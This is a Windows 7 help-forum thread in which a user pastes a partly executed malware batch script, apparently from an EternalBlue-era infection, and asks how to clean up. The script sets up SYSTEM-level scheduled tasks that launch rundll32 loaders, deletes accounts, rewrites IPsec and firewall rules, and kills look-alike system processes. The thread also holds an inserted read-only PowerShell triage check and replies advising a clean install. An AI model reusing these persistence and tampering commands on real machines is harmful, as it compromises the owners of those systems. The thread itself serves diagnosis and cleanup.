
Windows 7: Hit with a partial of the eternalblue attack

25 Jun 2017   #1
nukeofwf

Windows 7 Ultimate x64
 
 
Hit with a partial of the eternalblue attack

Had something from mysking.
This caused the following partially executed bat file to show up:

ping 127.0.0.1 -n 10
net1 user IISUSER$ /del&net1 user IUSR_Servs /del
cacls c:\windows\twain_32\csrss.exe /e /d system&cacls c:\windows\twain_32\csrss.exe /e /d everyone&del c:\windows\twain_32\*.*
schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
schtasks /create /tn "ok" /tr "rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
netsh ipsec static add policy name=win
netsh ipsec static add filterlist name=Allowlist
netsh ipsec static add filterlist name=denylist
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
netsh ipsec static add filteraction name=Allow action=permit
netsh ipsec static add filteraction name=deny action=block
netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
netsh ipsec static set policy name=win assign=y
ver | find "5.1." > NUL && sc config SharedAccess start= auto && net start SharedAccess && netsh firewall set opmode mode=enable && netsh firewall set portopening protocol = ALL port = 445 name = 445 mode = DISABLE scope = ALL profile = ALL
@Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\system\svchost.exe'" Call Terminate &del C:\Windows\system\svchost.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\twain_32\svchost.exe'" Call Terminate &del C:\Windows\twain_32\svchost.exe
@Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\twain_32\csrss.exe'" Call Terminate &del C:\Windows\twain_32\csrss.exe
@Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\tasks\csrss.exe'" Call Terminate &del C:\Windows\tasks\csrss.exe
del c:\windows\debug\c2.bat
exit

I think I have a fair bit of it taken care of manually, but are there additional, not immediately apparent, issues?


25 Jun 2017   #2
torchwood

W7 home premium 32bit/W7HP 64bit/w10 tp insider ring
 
 

Hi nukeofwf,

As that malware is kicking in IMMEDIATELY on startup (winlogon.exe), and then infecting the 2 major elements of the OS, svchost.exe & csrss.exe, it's also changing permissions, setting up scheduled tasks, re-writing firewall rules, creating a remote connection, and resetting your hosts file.
If you have not reset/cleaned all of the above, the system is still infected.

I would suggest you go OFFLINE until you have performed a clean install.
(Not sure, but this might be WannaCry, as it's also playing around in IIS - SMB1.)
I'm not a security/malware expert, but if it was my system:

Your best bet is a clean install.

Roy
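A read-only triage check for the artefacts named in the c2.bat posted in #1 and walked through in Roy's reply (the scheduled tasks, the dropped files, the look-alike OS binaries and the IPsec policy). This is an added example written for this thread, not something posted by nukeofwf or the other repliers; it assumes an elevated PowerShell prompt on the affected Windows 7 host and that netsh prints the policy name on an English "Policy Name" line.

```powershell
# Added read-only triage check for the artefacts named in the posted c2.bat.
# It only reports; it removes nothing. Assumes an elevated PowerShell prompt
# on the affected Windows 7 host (Get-WmiObject is used because
# Get-ScheduledTask / Get-CimInstance are not available on stock Windows 7).

$findings = @()

# 1. Scheduled tasks the script registers: "Mysa1" and "ok", both of which run
#    rundll32 ...,ServiceMain as SYSTEM at every start.
foreach ($task in 'Mysa1', 'ok') {
    $null = schtasks.exe /Query /TN $task /FO LIST 2>$null
    if ($LASTEXITCODE -eq 0) {
        $findings += "Scheduled task '$task' is registered"
    }
}

# 2. Loader and dropper files referenced by the script.
$paths = 'C:\Windows\debug\item.dat', 'C:\Windows\debug\ok.dat',
         'C:\Windows\debug\c2.bat'
foreach ($p in $paths) {
    if (Test-Path -LiteralPath $p) { $findings += "File present: $p" }
}

# 3. Processes using OS binary names but running outside System32. The script's
#    own wmic lines kill these paths, so a hit means that part never ran.
$system32 = (Join-Path $env:SystemRoot 'System32').ToLower()
$names = "Name='winlogon.exe' OR Name='svchost.exe' OR Name='csrss.exe'"
Get-WmiObject Win32_Process -Filter $names |
    Where-Object { $_.ExecutablePath -and
                   -not $_.ExecutablePath.ToLower().StartsWith($system32) } |
    ForEach-Object {
        $findings += "$($_.Name) (PID $($_.ProcessId)) running from $($_.ExecutablePath)"
    }

# 4. The IPsec policy 'win' the script assigns to block inbound TCP
#    135/137/138/139/445 (it keeps rival worms out; it is not a fix for you).
#    Assumption: netsh prints "Policy Name : win" as on English-locale systems.
$ipsec = netsh ipsec static show policy name=win 2>&1 | Out-String
if ($ipsec -match '(?m)^\s*Policy Name\s*:\s*win\s*$') {
    $findings += "IPsec policy 'win' exists (check 'assign' and the 'denylist' filter list)"
}

if ($findings.Count -eq 0) { 'No artefacts from the posted script found.' }
else { $findings | ForEach-Object { "[!] $_" } }
```

A clean result from this check only covers what the posted fragment names; it says nothing about the rest of the dropper, so it does not change the clean-install advice given in the thread.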
25 Jun 2017   #3
Layback Bear

Windows 7 Pro. 64/SP-1
 
 

I agree with Roy, a Clean Install would be my choice.

To add to that, I would also do this before the Clean Install, to make sure no junk is left behind.

Disk - Clean and Clean All with Diskpart Command - Windows 7 Help Forums

Keep in mind that anything that was hooked to that computer could also be infected.


Jack

25 Jun 2017   #4
nukeofwf

Windows 7 Ultimate x64
 
 

Thanks for the info; yeah, I am seeing really weird things like a completely empty system directory, etc.
Looks like a cold install will be the order of the day.